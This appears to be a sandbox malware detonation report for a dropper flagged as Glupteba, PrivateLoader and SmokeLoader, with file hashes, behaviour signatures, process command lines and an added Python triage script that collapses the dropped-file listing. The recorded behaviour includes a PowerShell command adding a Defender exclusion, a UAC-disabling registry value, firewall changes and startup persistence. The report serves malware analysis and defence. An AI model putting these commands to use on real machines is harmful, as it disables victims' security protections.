C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/1868-530-0x0000000061E00000-0x0000000061EF3000-memory.dmp
\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
C:\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA1 | 4a6352bb47c7e1666a60c76f9b17ca4707872bd9 |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
| SHA512 | 9e6cf6519e21143f9b570a878a5ca1bba376256217c34ab676e8d632611d468f277a0d6f946ab8705121002d96a89274f38458affe3df3a3a1c75e336d7d66e2 |
memory/1524-578-0x0000000002840000-0x0000000002C38000-memory.dmp
memory/1868-589-0x0000000000400000-0x0000000000639000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | 5c2be31ca24cfcf4a2c0170a04b370c2 |
| SHA1 | f914b9fae082aa2a557bfa41128195b15d2a9ea4 |
| SHA256 | 3aed316b26acbbf1dbc4c2c6367b6559dd1f49b8c125c3bbd37f7084d5a9a4f0 |
| SHA512 | de69c53a55f507cfd8383103d889b4fa0df03fb253a6493cf2e5887f5fb609bf1ee04eae73560bfe91605cd163fd8d49e74d4e982794bf6fcf33e3887620532d |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357
| MD5 | a266bb7dcc38a562631361bbf61dd11b |
| SHA1 | 3b1efd3a66ea28b16697394703a72ca340a05bd5 |
| SHA256 | df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e |
| SHA512 | 0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc |
C:\Users\Admin\AppData\Local\Temp\HMvTITvwCIIOPWHKa\dvQXzghxGoSBWXp\MleYOBj.exe
| MD5 | 24a387fda6e0f36f9af44d65487c5f5b |
| SHA1 | a2e4ddfce98b2936da2d1bc0d9f51f49d4c3c970 |
| SHA256 | b1a7ec17bf00d0d8d15adeb1f9d9de29404841b9f6c1df3f356f5255baf18ffb |
| SHA512 | f4fb7d8c5033bf49f844395180dd52012fdfd67deea344bd46d7d99e9ea9552994b7daef5cdf83530a91d6cac53ebc06a25f945beaa7172bf3af5f0e02148a61 |
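The dropped-file listing above logs every write separately, so one payload shows up under several names, with and without a drive letter, and once through the NT `\??\` prefix, while the `memory/PID-N-start-end-memory.dmp` lines sit in between. The script below is an added example written for this page, not tooling from the report or from tria.ge. It parses a constructed sample copied from the listing (SHA1/SHA512 rows omitted to keep it short), collapses drop events to unique artifacts keyed by SHA256, and sizes the dumps that start at the default 32-bit image base. Two assumptions are built in: drive-less paths are taken to be on `C:`, and `0x00400000` is used as the image base to look for.

```python
"""Collapse a sandbox dropped-file listing into unique payloads and memory regions."""
import re
from dataclasses import dataclass, field

# Constructed sample: a few entries copied from the listing above (SHA1/SHA512
# rows omitted; the parser accepts whatever hash rows the report emits).
SAMPLE_LISTING = r"""
memory/2788-78-0x0000000000400000-0x0000000000D1C000-memory.dmp
\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe
| MD5 | 1c4ba9eb815ad39858def7341d3cfff1 |
| SHA256 | 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238 |
C:\Users\Admin\Pictures\5zTlIFqXp0wXeIB3IUBzLjf8.exe
| MD5 | 1c4ba9eb815ad39858def7341d3cfff1 |
| SHA256 | 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238 |
C:\Users\Admin\Pictures\sFYOXjNaiPEQT9okLFbO5h2O.exe
| MD5 | 1c4ba9eb815ad39858def7341d3cfff1 |
| SHA256 | 43b6c8b1f176259c637c7da21aeab0fcf0f3934c599ceacb755c937ef71d0238 |
C:\Users\Admin\Pictures\oTYnKcA5mm9jshIDchCMeOvK.exe
| MD5 | cde358332e1c8373e0946480461c2632 |
| SHA256 | 4c210af24e23fc945da65700e2934898576c31e8a04212032d776dc7ba830844 |
memory/2788-116-0x0000000000400000-0x0000000000D1C000-memory.dmp
\??\c:\users\admin\pictures\otynkca5mm9jshidchcmeovk.exe
| MD5 | cde358332e1c8373e0946480461c2632 |
| SHA256 | 4c210af24e23fc945da65700e2934898576c31e8a04212032d776dc7ba830844 |
C:\Users\Admin\AppData\Local\Temp\latestX.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
\Program Files\Google\Chrome\updater.exe
| MD5 | bae29e49e8190bfbbf0d77ffab8de59d |
| SHA256 | f91e4ff7811a5848561463d970c51870c9299a80117a89fb86a698b9f727de87 |
memory/1868-530-0x0000000061E00000-0x0000000061EF3000-memory.dmp
"""

MEM_RE = re.compile(r"^memory/(\d+)-\d+-0x([0-9A-Fa-f]+)-0x([0-9A-Fa-f]+)-memory\.dmp$")

@dataclass
class Drop:
    path: str
    hashes: dict = field(default_factory=dict)

@dataclass(frozen=True)
class Region:
    pid: int
    start: int
    end: int

@dataclass
class Artifact:
    sha256: str
    md5: str
    paths: list = field(default_factory=list)   # first-seen spelling of each distinct path
    events: int = 0                              # how many drop events the report logged

def normalize_path(raw: str) -> str:
    """Strip the NT '\\??\\' prefix and put drive-less paths on C: (assumption:
    the sandbox VM's system drive; the report never names another one)."""
    p = raw[4:] if raw.startswith("\\??\\") else raw
    return "C:" + p if p.startswith("\\") else p

def parse_listing(text: str):
    drops, regions, current = [], [], None
    for line in (l.strip() for l in text.splitlines()):
        if not line:
            continue
        m = MEM_RE.match(line)
        if m:
            regions.append(Region(int(m.group(1)), int(m.group(2), 16), int(m.group(3), 16)))
            continue
        if line.startswith("|"):                      # '| MD5 | <hex> |' style hash row
            cells = [c.strip() for c in line.strip("|").split("|")]
            if current is not None and len(cells) == 2:
                current.hashes[cells[0].lower()] = cells[1].lower()
            continue
        current = Drop(normalize_path(line))          # any other line starts a new file entry
        drops.append(current)
    return drops, regions

def unique_artifacts(drops):
    """One record per SHA256, collecting every distinct (case-insensitive) path."""
    by_hash = {}
    for d in drops:
        sha = d.hashes.get("sha256")
        if not sha:
            continue
        art = by_hash.setdefault(sha, Artifact(sha, d.hashes.get("md5", "")))
        art.events += 1
        if d.path.lower() not in (p.lower() for p in art.paths):
            art.paths.append(d.path)
    return list(by_hash.values())

def multi_path(artifacts):
    """Payloads written under more than one name or directory; in the sample the
    bytes of Temp\\latestX.exe reappear as Program Files\\Google\\Chrome\\updater.exe."""
    return [a for a in artifacts if len(a.paths) > 1]

def image_base_regions(regions, base: int = 0x400000):
    """Size of each PID's dump that starts at the default 32-bit image base; once
    a packer or hollowing has run, that dump is where to carve the unpacked PE."""
    return {r.pid: r.end - r.start for r in regions if r.start == base}

if __name__ == "__main__":
    drops, regions = parse_listing(SAMPLE_LISTING)
    for a in unique_artifacts(drops):
        print(f"{a.sha256[:16]}... md5={a.md5} events={a.events}")
        for p in a.paths:
            print(f"    {p}")
    for pid, size in image_base_regions(regions).items():
        print(f"PID {pid}: {size:#x} bytes mapped at 0x400000")
```

Run it as-is to see the sample collapse to three payloads; point `parse_listing` at the full listing text to get the real picture of which names map to which bytes.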
Analysis: behavioral2
Detonation Overview
Submitted
2023-11-21 22:51
Reported
2023-11-21 22:55
Platform
win10v2004-20231020-en
Max time kernel
64s
Max time network
158s
Command Line
Signatures
Glupteba
Glupteba payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
PrivateLoader
SmokeLoader
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4776 created 3192 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\Explorer.EXE |
| PID 4776 created 3192 | N/A | C:\Windows\SysWOW64\cmd.exe | C:\Windows\Explorer.EXE |
UAC bypass
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Windows security bypass
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Windows\System32\Conhost.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\Random.exe = "0" | C:\Windows\System32\Conhost.exe | N/A |
Detected executables Discord URL observed in first stage droppers
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Identifies VirtualBox via ACPI registry values (likely anti-VM)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Downloads MZ/PE file
Modifies Windows Firewall
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
| N/A | N/A | C:\Windows\system32\netsh.exe | N/A |
Stops running service(s)
Checks BIOS information in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\allnewumm.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-3811856890-180006922-3689258494-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\X1JzKRfgB0B6mlpDNhxRTMYH.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KeKNI0HBC3jTbaXu7F5P7HsG.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\CSV14BpysP5J7MQG4zJUEk8j.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qY671kJQ7AzPIoEelwuZgy8N.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\LBxBdM1YkSZDVFCIrKdVFUoV.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TIvrl8AYVkg08cvMP7IdS09k.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\H9PWKUBrzog8hpkvdpqSJkYl.bat | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
Executes dropped EXE
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| N/A | N/A | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Enumerates connected drives
| Description | Indicator | Process | Target |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\D: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
| File opened (read-only) | \??\F: | C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1536 set thread context of 4444 | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe |
| PID 3808 set thread context of 2276 | N/A | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
| N/A | N/A | C:\Windows\System32\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Delays execution with timeout.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\timeout.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS30FE.tmp\Install.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\toolspub2.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\reg.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Broom.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Users\Admin\AppData\Local\Temp\allnewumm.exe
"C:\Users\Admin\AppData\Local\Temp\allnewumm.exe"
C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe
"C:\Users\Admin\AppData\Local\Temp\InstallSetup5.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe
"C:\Users\Admin\AppData\Local\Temp\e0cbefcb1af40c7d4aff4aca26621a98.exe"
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Broom.exe
C:\Users\Admin\AppData\Local\Temp\Random.exe
"C:\Users\Admin\AppData\Local\Temp\Random.exe"
C:\Users\Admin\AppData\Local\Temp\latestX.exe
"C:\Users\Admin\AppData\Local\Temp\latestX.exe"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\Random.exe" -Force
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"
C:\Users\Admin\AppData\Local\Temp\toolspub2.exe
"C:\Users\Admin\AppData\Local\Temp\toolspub2.exe"
C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe
"C:\Users\Admin\Pictures\tE5AFUP5eIEX56SyJTaGFNCE.exe"
C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe
"C:\Users\Admin\Pictures\qVMXMu075wJzdK0JO5poj9gi.exe"
C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe
"C:\Users\Admin\Pictures\SpMwCbcnnE24Y9Cm4FMqbe66.exe"
C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe
"C:\Users\Admin\Pictures\r5retndwSKQXRFWSHGEiAp2x.exe"
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --silent --allusers=0
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\GlPeykXYgfNELRIuXGtYZznP.exe" --version
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=105.0.4970.16 --initial-client-data=0x2e4,0x2e8,0x2ec,0x2e0,0x2f0,0x6ed874f0,0x6ed87500,0x6ed8750c
C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe
"C:\Users\Admin\Pictures\ajCAHplTtJAZsFYO2cpv1Bao.exe"
C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe
"C:\Users\Admin\Pictures\Hkg2MLRdnyC4E5ktmeVvVt9N.exe"
C:\Users\Admin\AppData\Local\Temp\7zS1AF5.tmp\Install.exe
.\Install.exe
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
"C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=4148 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231121225253" --session-guid=79dc5c52-c873-4ed6-b970-4ec9914ceb6f --server-tracking-blob=ZDJlOTI2ZmU5ZWVkNDMzNGE5NGY5YzIxNjc1NDcwZjg0NWMzNDk2NmJkNDEzNmRlMTlkZGYzYmY1MDUwODAzZTp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTcwMDYwNzE2Mi41NTQwIiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiJmMTY0ZGRmMC1iOWRiLTRkOGUtYTYzOS04ZTMxMTBiNzBhNDgifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=0C05000000000000
C:\Users\Admin\Pictures\GlPeykXYgfNELRIuXGtYZznP.exe
